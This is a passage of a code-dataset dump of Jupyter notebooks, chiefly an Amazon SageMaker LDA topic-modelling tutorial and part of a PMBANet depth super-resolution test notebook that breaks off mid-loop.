0.994 0.454 0.947 0.364\n 0.154 0.322 0.571 0.19 0.476 0.925 0.871 0.605 0.442 0.585 0.544 0.316\n 0.915 0.253 0.973 0.501 0.402 0.96 0.206 0.501 0.37 0.463 0.904 0.981\n 0.969 0.877 0.724 0.5 0.447 0.499 0.443 0.349 0.79 0.051 0.384 0.27\n 0.094 0.774 0.742 0.16 0.517 0.266 0.908 0.796 0.862 0.987 0.939 0.909\n 0.962 0.587 0.964 0.159 0.029 0.952 0.416 0.72 0.346 0.257 0.152 0.233\n 0.862 0.457 0.153 0.076 0.105 0.634 0.652 0.435 0.757 0.985 0.487 0.114\n 0.95 0.217 0.877 0.483 0.302 0.929 0.856 0.768 0.223 0.006 0.841 0.565\n 0.611 0.407 0.71 0.588 0.654 0.197 0.506 0.938 0.779 0.387 0.007 0.482\n 0.523 0.993 0.671 0.044 0.497 0.71 0.418 0.06 0.114 0.082 0.811 0.083\n 0.773 0.134 0.87 0.414 0.787 0.972 0.132 0.047 0.593 0.502 0.15 0.042\n 0.363 0.311 0.17 0.895 0.569 0.774 0.006 0.408 0.92 0.753 0.543 0.279\n 0.911 0.314 0.195 0.538 0.977 0.606 0.954 0.378 0.397 0.261 0.085 0.656\n 0.978 0.598 0.216 0.832 0.105 0.958 0.185 0.81 0.444 0.308 0.013 0.176\n 0.603 0.383 0.671 0.436 0.981 0.072 0.713 0.349 0.962 0.055 0.315 0.417\n 0.052 0.076 0.198 0.786 0.397 0.757 0.145 0.539 0.671 0.583 0.42 0.575\n 0.563 0.286 0.788 0.481 0.403 0.85 0.864 0.945 0.427 0.511 0.268 0.091\n 0.049 0.611 0.137 0.58 0.281 0.057 0.453 0.461 0.895 0.701 0.662 0.599\n 0.967 0.562 0.295 0.6 0.742 0.909 0.69 0.383 0.553 0.078 0.949 0.109\n 0.771 0.083 0.712 0.514 0.549 0.403 0.575 0.494 0.31 0.307 0.091 0.874\n 0.591 0.315 0.199 0.372 0.131 0.905 0.32 0.284 0.516 0.055 0.832 0.042\n 0.927 0.667 0.273 0.426 0.054 0.799 0.356 0.564 0.223 0.772 0.79 0.628\n 0.893 0.512 0.523 0.518 0.48 0.869 0.49 0.416 0.775 0.864 0.921 0.968\n 0.109 0.812 0.943 0.042 0.179 0.943 0.324 0.079 0.017 0.226 0.848 0.803\n 0.873 0.834 0.696 0.582 0.125 0.042 0.917 0.909 0.491 0.5 0.101 0.779\n 0.65 0.424 0.94 0.582 0.706 0.935 0.286 0.057 0.544 0.198 0.893 0.537\n 0.405 0.91 0.908 0.297 0.288 0.368 0.654 0.347 0.002 0.677 0.32 0.691\n 0.17 0.133 0.586 0.857 0.001 0.639 0.223 0.164 0.689 0.97 0.913 0.947\n 0.962 0.44 0.201 0.343 0.493 0.662 0.728 0.295 0.445 0.739 0.764 0.955\n 0.206 0.298 0.996 0.835 0.983 0.033 0.801 0.284 0.621 0.941 0.293 0.865\n 0.158 0.788 0.681 0.613 0.705 0.753 0.006 0.175 0.414 0.299 0.116 0.67\n 0.66 0.845 0.905 0.369 0.11 0.841 0.717 0.348 0.537 0.116 0.024 0.575\n 0.211 0.427 0.84 0.447 0.056 0.427 0.39 0.424 0.48 0.738 0.698 0.377\n 0.143 0.242 0.877 0.238 0.188 0.786 0.965 0.112 0.952 0.679 0.916 0.13\n 0.882 0.353 0.433 0.608 0.297 0.558 0.663 0.646 0.185 0.91 0.131 0.217\n 0.549 0.759 0.087 0.96 0.11 0.613 0.643 0.218 0.126 0.535 0.751 0.097\n 0.681 0.782 0.367 0.197 0.05 0.742 0.623 0.763 0.625 0.317 0.364 0.879\n 0.445 0.751 0.87 0.727 0.879 0.035 0.412 0.907 0.895 0.923 0.373 0.22\n 0.21 0.176 0.182 0.821]]\n" ], [ "!minikube delete", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
cb1d076ea24c5819fb4ddecc6dc5fedc04e4f0f3
24,126
ipynb
Jupyter Notebook
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
2,610
2020-10-01T14:14:53.000Z
2022-03-31T18:02:31.000Z
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
1,959
2020-09-30T20:22:42.000Z
2022-03-31T23:58:37.000Z
introduction_to_amazon_algorithms/lda_topic_modeling/LDA-Introduction.ipynb
Amirosimani/amazon-sagemaker-examples
bc35e7a9da9e2258e77f98098254c2a8e308041a
[ "Apache-2.0" ]
2,052
2020-09-30T22:11:46.000Z
2022-03-31T23:02:51.000Z
39.038835
888
0.641424
[ [ [ "# An Introduction to SageMaker LDA\n\n***Finding topics in synthetic document data using Spectral LDA algorithms.***\n\n---\n\n1. [Introduction](#Introduction)\n1. [Setup](#Setup)\n1. [Training](#Training)\n1. [Inference](#Inference)\n1. [Epilogue](#Epilogue)", "_____no_output_____" ], [ "# Introduction\n***\n\nAmazon SageMaker LDA is an unsupervised learning algorithm that attempts to describe a set of observations as a mixture of distinct categories. Latent Dirichlet Allocation (LDA) is most commonly used to discover a user-specified number of topics shared by documents within a text corpus. Here each observation is a document, the features are the presence (or occurrence count) of each word, and the categories are the topics. Since the method is unsupervised, the topics are not specified up front, and are not guaranteed to align with how a human may naturally categorize documents. The topics are learned as a probability distribution over the words that occur in each document. Each document, in turn, is described as a mixture of topics.\n\nIn this notebook we will use the Amazon SageMaker LDA algorithm to train an LDA model on some example synthetic data. We will then use this model to classify (perform inference on) the data. The main goals of this notebook are to,\n\n* learn how to obtain and store data for use in Amazon SageMaker,\n* create an AWS SageMaker training job on a data set to produce an LDA model,\n* use the LDA model to perform inference with an Amazon SageMaker endpoint.\n\nThe following are ***not*** goals of this notebook:\n\n* understand the LDA model,\n* understand how the Amazon SageMaker LDA algorithm works,\n* interpret the meaning of the inference output\n\nIf you would like to know more about these things take a minute to run this notebook and then check out the SageMaker LDA Documentation and the **LDA-Science.ipynb** notebook.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nimport os, re\n\nimport boto3\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.set_printoptions(precision=3, suppress=True)\n\n# some helpful utility functions are defined in the Python module\n# \"generate_example_data\" located in the same directory as this\n# notebook\nfrom generate_example_data import generate_griffiths_data, plot_lda, match_estimated_topics\n\n# accessing the SageMaker Python SDK\nimport sagemaker\nfrom sagemaker.amazon.common import RecordSerializer\nfrom sagemaker.serializers import CSVSerializer\nfrom sagemaker.deserializers import JSONDeserializer", "_____no_output_____" ] ], [ [ "# Setup\n\n***\n\n*This notebook was created and tested on an ml.m4.xlarge notebook instance.*\n\nBefore we do anything at all, we need data! We also need to setup our AWS credentials so that AWS SageMaker can store and access data. In this section we will do four things:\n\n1. [Setup AWS Credentials](#SetupAWSCredentials)\n1. [Obtain Example Dataset](#ObtainExampleDataset)\n1. [Inspect Example Data](#InspectExampleData)\n1. [Store Data on S3](#StoreDataonS3)", "_____no_output_____" ], [ "## Setup AWS Credentials\n\nWe first need to specify some AWS credentials; specifically data locations and access roles. This is the only cell of this notebook that you will need to edit. In particular, we need the following data:\n\n* `bucket` - An S3 bucket accessible by this account.\n * Used to store input training data and model data output.\n * Should be within the same region as this notebook instance, training, and hosting.\n* `prefix` - The location in the bucket where this notebook's input and and output data will be stored. (The default value is sufficient.)\n* `role` - The IAM Role ARN used to give training and hosting access to your data.\n * See documentation on how to create these.\n * The script below will try to determine an appropriate Role ARN.", "_____no_output_____" ] ], [ [ "from sagemaker import get_execution_role\n\nsession = sagemaker.Session()\nrole = get_execution_role()\nbucket = session.default_bucket()\nprefix = \"sagemaker/DEMO-lda-introduction\"\n\nprint(\"Training input/output will be stored in {}/{}\".format(bucket, prefix))\nprint(\"\\nIAM Role: {}\".format(role))", "_____no_output_____" ] ], [ [ "## Obtain Example Data\n\n\nWe generate some example synthetic document data. For the purposes of this notebook we will omit the details of this process. All we need to know is that each piece of data, commonly called a *\"document\"*, is a vector of integers representing *\"word counts\"* within the document. In this particular example there are a total of 25 words in the *\"vocabulary\"*.\n\n$$\n\\underbrace{w}_{\\text{document}} = \\overbrace{\\big[ w_1, w_2, \\ldots, w_V \\big] }^{\\text{word counts}},\n\\quad\nV = \\text{vocabulary size}\n$$\n\nThese data are based on that used by Griffiths and Steyvers in their paper [Finding Scientific Topics](http://psiexp.ss.uci.edu/research/papers/sciencetopics.pdf). For more information, see the **LDA-Science.ipynb** notebook.", "_____no_output_____" ] ], [ [ "print(\"Generating example data...\")\nnum_documents = 6000\nnum_topics = 5\nknown_alpha, known_beta, documents, topic_mixtures = generate_griffiths_data(\n num_documents=num_documents, num_topics=num_topics\n)\nvocabulary_size = len(documents[0])\n\n# separate the generated data into training and tests subsets\nnum_documents_training = int(0.9 * num_documents)\nnum_documents_test = num_documents - num_documents_training\n\ndocuments_training = documents[:num_documents_training]\ndocuments_test = documents[num_documents_training:]\n\ntopic_mixtures_training = topic_mixtures[:num_documents_training]\ntopic_mixtures_test = topic_mixtures[num_documents_training:]\n\nprint(\"documents_training.shape = {}\".format(documents_training.shape))\nprint(\"documents_test.shape = {}\".format(documents_test.shape))", "_____no_output_____" ] ], [ [ "## Inspect Example Data\n\n*What does the example data actually look like?* Below we print an example document as well as its corresponding known *topic-mixture*. A topic-mixture serves as the \"label\" in the LDA model. It describes the ratio of topics from which the words in the document are found.\n\nFor example, if the topic mixture of an input document $\\mathbf{w}$ is,\n\n$$\\theta = \\left[ 0.3, 0.2, 0, 0.5, 0 \\right]$$\n\nthen $\\mathbf{w}$ is 30% generated from the first topic, 20% from the second topic, and 50% from the fourth topic. For more information see **How LDA Works** in the SageMaker documentation as well as the **LDA-Science.ipynb** notebook.\n\nBelow, we compute the topic mixtures for the first few training documents. As we can see, each document is a vector of word counts from the 25-word vocabulary and its topic-mixture is a probability distribution across the five topics used to generate the sample dataset.", "_____no_output_____" ] ], [ [ "print(\"First training document =\\n{}\".format(documents[0]))\nprint(\"\\nVocabulary size = {}\".format(vocabulary_size))", "_____no_output_____" ], [ "print(\"Known topic mixture of first document =\\n{}\".format(topic_mixtures_training[0]))\nprint(\"\\nNumber of topics = {}\".format(num_topics))\nprint(\"Sum of elements = {}\".format(topic_mixtures_training[0].sum()))", "_____no_output_____" ] ], [ [ "Later, when we perform inference on the training data set we will compare the inferred topic mixture to this known one.\n\n---\n\nHuman beings are visual creatures, so it might be helpful to come up with a visual representation of these documents. In the below plots, each pixel of a document represents a word. The greyscale intensity is a measure of how frequently that word occurs. Below we plot the first few documents of the training set reshaped into 5x5 pixel grids.", "_____no_output_____" ] ], [ [ "%matplotlib inline\n\nfig = plot_lda(documents_training, nrows=3, ncols=4, cmap=\"gray_r\", with_colorbar=True)\nfig.suptitle(\"Example Document Word Counts\")\nfig.set_dpi(160)", "_____no_output_____" ] ], [ [ "## Store Data on S3\n\nA SageMaker training job needs access to training data stored in an S3 bucket. Although training can accept data of various formats we convert the documents MXNet RecordIO Protobuf format before uploading to the S3 bucket defined at the beginning of this notebook. We do so by making use of the SageMaker Python SDK utility `RecordSerializer`.", "_____no_output_____" ] ], [ [ "# convert documents_training to Protobuf RecordIO format\nrecordio_protobuf_serializer = RecordSerializer()\nfbuffer = recordio_protobuf_serializer.serialize(documents_training)\n\n# upload to S3 in bucket/prefix/train\nfname = \"lda.data\"\ns3_object = os.path.join(prefix, \"train\", fname)\nboto3.Session().resource(\"s3\").Bucket(bucket).Object(s3_object).upload_fileobj(fbuffer)\n\ns3_train_data = \"s3://{}/{}\".format(bucket, s3_object)\nprint(\"Uploaded data to S3: {}\".format(s3_train_data))", "_____no_output_____" ] ], [ [ "# Training\n\n***\n\nOnce the data is preprocessed and available in a recommended format the next step is to train our model on the data. There are number of parameters required by SageMaker LDA configuring the model and defining the computational environment in which training will take place.\n\nFirst, we specify a Docker container containing the SageMaker LDA algorithm. For your convenience, a region-specific container is automatically chosen for you to minimize cross-region data communication. Information about the locations of each SageMaker algorithm is available in the documentation.", "_____no_output_____" ] ], [ [ "from sagemaker.amazon.amazon_estimator import get_image_uri\n\n# select the algorithm container based on this notebook's current location\n\nregion_name = boto3.Session().region_name\ncontainer = get_image_uri(region_name, \"lda\")\n\nprint(\"Using SageMaker LDA container: {} ({})\".format(container, region_name))", "_____no_output_____" ] ], [ [ "Particular to a SageMaker LDA training job are the following hyperparameters:\n\n* **`num_topics`** - The number of topics or categories in the LDA model.\n * Usually, this is not known a priori.\n * In this example, howevever, we know that the data is generated by five topics.\n\n* **`feature_dim`** - The size of the *\"vocabulary\"*, in LDA parlance.\n * In this example, this is equal 25.\n\n* **`mini_batch_size`** - The number of input training documents.\n\n* **`alpha0`** - *(optional)* a measurement of how \"mixed\" are the topic-mixtures.\n * When `alpha0` is small the data tends to be represented by one or few topics.\n * When `alpha0` is large the data tends to be an even combination of several or many topics.\n * The default value is `alpha0 = 1.0`.\n\nIn addition to these LDA model hyperparameters, we provide additional parameters defining things like the EC2 instance type on which training will run, the S3 bucket containing the data, and the AWS access role. Note that,\n\n* Recommended instance type: `ml.c4`\n* Current limitations:\n * SageMaker LDA *training* can only run on a single instance.\n * SageMaker LDA does not take advantage of GPU hardware.\n * (The Amazon AI Algorithms team is working hard to provide these capabilities in a future release!)", "_____no_output_____" ] ], [ [ "# specify general training job information\nlda = sagemaker.estimator.Estimator(\n container,\n role,\n output_path=\"s3://{}/{}/output\".format(bucket, prefix),\n train_instance_count=1,\n train_instance_type=\"ml.c4.2xlarge\",\n sagemaker_session=session,\n)\n\n# set algorithm-specific hyperparameters\nlda.set_hyperparameters(\n num_topics=num_topics,\n feature_dim=vocabulary_size,\n mini_batch_size=num_documents_training,\n alpha0=1.0,\n)\n\n# run the training job on input data stored in S3\nlda.fit({\"train\": s3_train_data})", "_____no_output_____" ] ], [ [ "If you see the message\n\n> `===== Job Complete =====`\n\nat the bottom of the output logs then that means training sucessfully completed and the output LDA model was stored in the specified output path. You can also view information about and the status of a training job using the AWS SageMaker console. Just click on the \"Jobs\" tab and select training job matching the training job name, below:", "_____no_output_____" ] ], [ [ "print(\"Training job name: {}\".format(lda.latest_training_job.job_name))", "_____no_output_____" ] ], [ [ "# Inference\n\n***\n\nA trained model does nothing on its own. We now want to use the model we computed to perform inference on data. For this example, that means predicting the topic mixture representing a given document.\n\nWe create an inference endpoint using the SageMaker Python SDK `deploy()` function from the job we defined above. We specify the instance type where inference is computed as well as an initial number of instances to spin up.", "_____no_output_____" ] ], [ [ "lda_inference = lda.deploy(\n initial_instance_count=1,\n instance_type=\"ml.m4.xlarge\", # LDA inference may work better at scale on ml.c4 instances\n)", "_____no_output_____" ] ], [ [ "Congratulations! You now have a functioning SageMaker LDA inference endpoint. You can confirm the endpoint configuration and status by navigating to the \"Endpoints\" tab in the AWS SageMaker console and selecting the endpoint matching the endpoint name, below: ", "_____no_output_____" ] ], [ [ "print(\"Endpoint name: {}\".format(lda_inference.endpoint_name))", "_____no_output_____" ] ], [ [ "With this realtime endpoint at our fingertips we can finally perform inference on our training and test data.\n\nWe can pass a variety of data formats to our inference endpoint. In this example we will demonstrate passing CSV-formatted data. Other available formats are JSON-formatted, JSON-sparse-formatter, and RecordIO Protobuf. We make use of the SageMaker Python SDK utilities `CSVSerializer` and `JSONDeserializer` when configuring the inference endpoint.", "_____no_output_____" ] ], [ [ "lda_inference.serializer = CSVSerializer()\nlda_inference.deserializer = JSONDeserializer()", "_____no_output_____" ] ], [ [ "We pass some test documents to the inference endpoint. Note that the serializer and deserializer will atuomatically take care of the datatype conversion from Numpy NDArrays.", "_____no_output_____" ] ], [ [ "results = lda_inference.predict(documents_test[:12])\n\nprint(results)", "_____no_output_____" ] ], [ [ "It may be hard to see but the output format of SageMaker LDA inference endpoint is a Python dictionary with the following format.\n\n```\n{\n 'predictions': [\n {'topic_mixture': [ ... ] },\n {'topic_mixture': [ ... ] },\n {'topic_mixture': [ ... ] },\n ...\n ]\n}\n```\n\nWe extract the topic mixtures, themselves, corresponding to each of the input documents.", "_____no_output_____" ] ], [ [ "computed_topic_mixtures = np.array(\n [prediction[\"topic_mixture\"] for prediction in results[\"predictions\"]]\n)\n\nprint(computed_topic_mixtures)", "_____no_output_____" ] ], [ [ "If you decide to compare these results to the known topic mixtures generated in the [Obtain Example Data](#ObtainExampleData) Section keep in mind that SageMaker LDA discovers topics in no particular order. That is, the approximate topic mixtures computed above may be permutations of the known topic mixtures corresponding to the same documents.", "_____no_output_____" ] ], [ [ "print(topic_mixtures_test[0]) # known test topic mixture\nprint(computed_topic_mixtures[0]) # computed topic mixture (topics permuted)", "_____no_output_____" ] ], [ [ "## Stop / Close the Endpoint\n\nFinally, we should delete the endpoint before we close the notebook.\n\nTo do so execute the cell below. Alternately, you can navigate to the \"Endpoints\" tab in the SageMaker console, select the endpoint with the name stored in the variable `endpoint_name`, and select \"Delete\" from the \"Actions\" dropdown menu. ", "_____no_output_____" ] ], [ [ "sagemaker.Session().delete_endpoint(lda_inference.endpoint_name)", "_____no_output_____" ] ], [ [ "# Epilogue\n\n---\n\nIn this notebook we,\n\n* generated some example LDA documents and their corresponding topic-mixtures,\n* trained a SageMaker LDA model on a training set of documents,\n* created an inference endpoint,\n* used the endpoint to infer the topic mixtures of a test input.\n\nThere are several things to keep in mind when applying SageMaker LDA to real-word data such as a corpus of text documents. Note that input documents to the algorithm, both in training and inference, need to be vectors of integers representing word counts. Each index corresponds to a word in the corpus vocabulary. Therefore, one will need to \"tokenize\" their corpus vocabulary.\n\n$$\n\\text{\"cat\"} \\mapsto 0, \\; \\text{\"dog\"} \\mapsto 1 \\; \\text{\"bird\"} \\mapsto 2, \\ldots\n$$\n\nEach text document then needs to be converted to a \"bag-of-words\" format document.\n\n$$\nw = \\text{\"cat bird bird bird cat\"} \\quad \\longmapsto \\quad w = [2, 0, 3, 0, \\ldots, 0]\n$$\n\nAlso note that many real-word applications have large vocabulary sizes. It may be necessary to represent the input documents in sparse format. Finally, the use of stemming and lemmatization in data preprocessing provides several benefits. Doing so can improve training and inference compute time since it reduces the effective vocabulary size. More importantly, though, it can improve the quality of learned topic-word probability matrices and inferred topic mixtures. For example, the words *\"parliament\"*, *\"parliaments\"*, *\"parliamentary\"*, *\"parliament's\"*, and *\"parliamentarians\"* are all essentially the same word, *\"parliament\"*, but with different conjugations. For the purposes of detecting topics, such as a *\"politics\"* or *governments\"* topic, the inclusion of all five does not add much additional value as they all essentiall describe the same feature.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ] ]
cb1d272892087485d2b06c9f3be6e9cf6280fed4
34,839
ipynb
Jupyter Notebook
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
PMBANet_TOPO/Test_TOPO.ipynb
Alina-Mingchi/TOPO_final
a8983006929b60bda0ed1d2e9a9130427b628431
[ "MIT" ]
null
null
null
28.650493
337
0.5435
[ [ [ "from __future__ import print_function\nimport argparse\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom data import get_eval_set\nfrom functools import reduce\nimport scipy.io as sio\nimport time\nimport imageio\nimport os\nimport numpy as np\nfrom PIL import Image\nimport scipy.signal\n\nfrom pmpanet_x8 import Net as PMBAX8\n", "_____no_output_____" ], [ "def downsample(ar,factor):\n kernel = np.full((factor,factor),1/(factor**2))\n ar = scipy.signal.convolve2d(np.asarray(ar),kernel,mode='full')\n ar = ar[factor-1::factor,factor-1::factor]\n return ar\n ", "_____no_output_____" ], [ "current_dir = os.getcwd()\ndirect = os.path.abspath(os.path.join(current_dir, os.pardir))\ndirectory = direct+'/Data_preprocessing'", "_____no_output_____" ], [ "# Create folder of png for the lr depth\n\n# rgb_dir = directory+'/EPFL_nadir/rgb/'\n# rgb_dir = directory+'/EPFL_oblique/rgb/'\n# rgb_dir = directory+'/comballaz_nadir/rgb/'\nrgb_dir = directory+'/comballaz_oblique/rgb/'\n_files = os.listdir(rgb_dir)\n_files.sort()\n_rgb_files = [rgb_dir + f for f in _files]\n_rgb_files.sort()\nprint(len(_rgb_files))\n\n# dist_dir = directory+'/EPFL_nadir/dist/'\n# dist_dir = directory+'/EPFL_oblique/dist/'\n# dist_dir = directory+'/comballaz_nadir/dist/'\ndist_dir = directory+'/comballaz_oblique/dist/'\n_files = os.listdir(dist_dir)\n_files.sort()\n_dist_files = [dist_dir + f for f in _files]\n_dist_files.sort()\nprint(len(_dist_files))\n\n\nfor num in range(len(_dist_files)):\n dist_img = torch.load(_dist_files[num])\n dist_img = dist_img.detach().cpu().numpy()\n down_img = downsample(dist_img,8)\n \n temp = np.zeros((136,160))\n temp[:60,:90] = down_img\n print(temp.shape)\n im = Image.fromarray(temp)\n im = im.convert('L')\n# im.save(directory+'/EPFL_nadir/distpng/'+str(num)+'.png')\n# im.save(directory+'/EPFL_oblique/distpng/'+str(num)+'.png')\n# im.save(directory+'/comballaz_nadir/distpng/'+str(num)+'.png')\n im.save(directory+'/comballaz_oblique/distpng/'+str(num)+'.png')\n \n rgb_img = imageio.imread(_rgb_files[num])\n temp2 = np.zeros((1088,1280,3))\n temp2[:480,:720,:] = rgb_img\n print(temp2.shape)\n# imageio.imsave(directory+'/EPFL_nadir/rgbpng/'+str(num)+'.png',temp2)\n# imageio.imsave(directory+'/EPFL_oblique/rgbpng/'+str(num)+'.png',temp2)\n# imageio.imsave(directory+'/comballaz_nadir/rgbpng/'+str(num)+'.png',temp2)\n imageio.imsave(directory+'/comballaz_oblique/rgbpng/'+str(num)+'.png',temp2)\n", "Lossy conversion from float64 to uint8. Range [0.0, 255.0]. Convert image to uint8 prior to saving to suppress this warning.\n" ], [ "def save_img(img, img_name):\n\n save_img = img.squeeze().clamp(0, 1).numpy()\n\n save_dir=os.path.join(opt.output,opt.test_dataset)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n \n save_fn = save_dir +'/'+ img_name\n imageio.imwrite(save_fn,save_img*255)", "_____no_output_____" ], [ "# # Testing settings EPFL nadir\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/EPFL_nadir/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/EPFL_nadir/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_nadir/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)\n", "_____no_output_____" ], [ "# # Testing settings EPFL oblique\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/EPFL_oblique/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/EPFL_oblique/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/EPFL_oblique/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)\n", "_____no_output_____" ], [ "# # Testing settings comballz nadir\n# parser = argparse.ArgumentParser(description='PyTorch Super Res Example')\n# parser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\n# parser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\n# parser.add_argument('--gpu_mode', type=bool, default=False)\n# parser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\n# parser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\n# parser.add_argument('--gpus', default=1, type=float, help='number of gpu')\n# parser.add_argument('--input_dir', type=str, default=directory)\n# parser.add_argument('--output', default='/comballaz_nadir/Results/', help='Location to save checkpoint models')\n# parser.add_argument('--test_dataset', type=str, default='/comballaz_nadir/distpng/')\n# parser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_nadir/rgbpng/')\n# parser.add_argument('--model_type', type=str, default='PMBAX8')\n# parser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\n# opt = parser.parse_args(\"\")\n\n# gpus_list=range(opt.gpus)\n# print(opt)", "_____no_output_____" ], [ "# Testing settings comballz oblique\nparser = argparse.ArgumentParser(description='PyTorch Super Res Example')\nparser.add_argument('--upscale_factor', type=int, default=8, help=\"super resolution upscale factor\")\nparser.add_argument('--testBatchSize', type=int, default=1, help='testing batch size')\nparser.add_argument('--gpu_mode', type=bool, default=False)\nparser.add_argument('--threads', type=int, default=1, help='number of threads for data loader to use')\nparser.add_argument('--seed', type=int, default=123, help='random seed to use. Default=123')\nparser.add_argument('--gpus', default=1, type=float, help='number of gpu')\nparser.add_argument('--input_dir', type=str, default=directory)\nparser.add_argument('--output', default='/comballaz_oblique/Results/', help='Location to save checkpoint models')\nparser.add_argument('--test_dataset', type=str, default='/comballaz_oblique/distpng/')\nparser.add_argument('--test_rgb_dataset', type=str, default='/comballaz_oblique/rgbpng/')\nparser.add_argument('--model_type', type=str, default='PMBAX8')\nparser.add_argument('--model', default=\"./pre_train_model/PMBA_color_x8.pth\", help='pretrained x8 model')\n\nopt = parser.parse_args(\"\")\n\ngpus_list=range(opt.gpus)\nprint(opt)", "Namespace(gpu_mode=False, gpus=1, input_dir='/home/beast2020/Desktop/mingchi/', model='./pre_train_model/PMBA_color_x8.pth', model_type='PMBAX8', output='comballaz_oblique/Results/', seed=123, testBatchSize=1, test_dataset='comballaz_oblique/distpng/', test_rgb_dataset='comballaz_oblique/rgbpng/', threads=1, upscale_factor=8)\n" ], [ "\ncuda = opt.gpu_mode\nif cuda and not torch.cuda.is_available():\n raise Exception(\"No GPU found, please run without --cuda\")\n\ntorch.manual_seed(opt.seed)\nif cuda:\n torch.cuda.manual_seed(opt.seed)\n\nprint('===> Loading datasets')\ntest_set = get_eval_set(os.path.join(opt.input_dir,opt.test_dataset),os.path.join(opt.input_dir,opt.test_rgb_dataset))\ntesting_data_loader = DataLoader(dataset=test_set, batch_size=opt.testBatchSize, shuffle=False)\n\nprint('===> Building model')\nif opt.model_type == 'PMBAX8':\n model = PMBAX8(num_channels=1, base_filter=64, feat = 256, num_stages=3, scale_factor=opt.upscale_factor) ##For NTIRE2018\nelse:\n model = PMBAX8(base_filter=64, feat = 256, num_stages=5, scale_factor=opt.upscale_factor) ###D-DBPN\n####\nif cuda:\n model = torch.nn.DataParallel(model, device_ids=gpus_list)\n\nif os.path.exists(opt.model):\n model.load_state_dict(torch.load(opt.model, map_location=lambda storage, loc: storage))\n print('Pre-trained x8 model is loaded.<---------------------------->')\n\nif cuda:\n model = model.cuda(gpus_list[0])\n\n", "===> Loading datasets\n===> Building model\nPre-trained x8 model is loaded.<---------------------------->\n" ], [ "model.eval()\ntorch.set_grad_enabled(False)\n", "_____no_output_____" ], [ "\nfor batch in testing_data_loader:\n input_i,input_rgb, name = Variable(batch[0],volatile=True),Variable(batch[1],volatile=True), batch[2]\n if cuda:\n input_i = input_i.cuda(gpus_list[0])\n input_rgb = input_rgb.cuda(gpus_list[0])\n t0 = time.time()\n prediction = model(input_rgb,input_i)\n t1 = time.time()\n print(\"===> Processing: %s || Timer: %.4f sec.\" % (name[0], (t1 - t0)))\n 